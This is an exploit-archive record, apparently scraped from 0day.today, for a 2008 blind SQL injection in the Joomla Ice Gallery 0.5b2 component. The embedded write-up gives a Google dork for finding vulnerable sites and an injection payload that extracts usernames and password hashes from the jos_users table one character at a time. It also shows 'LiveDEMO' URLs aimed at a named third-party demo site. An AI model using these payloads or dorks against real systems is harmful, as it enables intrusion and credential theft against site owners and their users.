Description
Exploit for unknown platform in category web applications
{"id": "1337DAY-ID-4540", "type": "zdt", "bulletinFamily": "exploit", "title": "Joomla Component Ice Gallery 0.5b2 (catid) Blind SQL Injection Vuln", "description": "Exploit for unknown platform in category web applications", "published": "2008-12-24T00:00:00", "modified": "2008-12-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/4540", "reporter": "boom3rang", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-08T23:40:58", "viewCount": 14, "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "sourceHref": "https://0day.today/exploit/4540", "sourceData": "===================================================================\r\nJoomla Component Ice Gallery 0.5b2 (catid) Blind SQL Injection Vuln\r\n===================================================================\r\n\r\n\r\n#############################################################\r\nJoomla Component com_ice(catid) Blind SQL-injection\r\n#############################################################\r\n\r\n\r\n###################################################\r\n#[~] Author : boom3rang \r\n#[~] Greetz : [email\u00a0protected], KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.\r\n#[~] Vulnerability : Blind SQL injection \r\n#[~] Google Dork : inurl:com_ice \"catid\"\r\n--------------------------------------------------\r\n#[!] <name>Ice Gallery</name>\r\n#[!] <creationDate>29/08/06</creationDate>\r\n#[!] <author>Markus Donhauser</author>\r\n#[!] 
<version>0.5 beta 2</version>\r\n###################################################\r\n\r\nExample:\r\nhttp://localHost/path/index.php?option=com_ice&catid=1[SQL code]\r\n\r\n\r\nSQL code:\r\nand ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96\r\n\r\n\r\nLiveDEMO:\r\n\r\nhttp://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and substring(@@version,1,1)=4 >>(False)\r\n\r\nhttp://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and substring(@@version,1,1)=5 >>(True)\r\n\r\nhttp://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96\r\n\r\n\r\n\n# 0day.today [2018-04-08] #", "_state": {"dependencies": 1645248371, "score": 1659766679}}